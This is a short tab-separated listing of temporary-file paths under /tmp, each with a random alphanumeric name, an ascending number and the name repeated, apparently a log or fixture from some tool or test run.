/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p	803	15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p
/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG	816	jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG
/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	822	ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	829	FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	848	S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	870	7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	876	NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	882	EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	888	oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk	894	FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk
/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ	900	S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ
/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0	906	ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0
/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw	912	EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw
/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV	918	oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV
/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji	924	7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji
/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN	931	NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN
/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7	937	lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7
/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2	943	vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2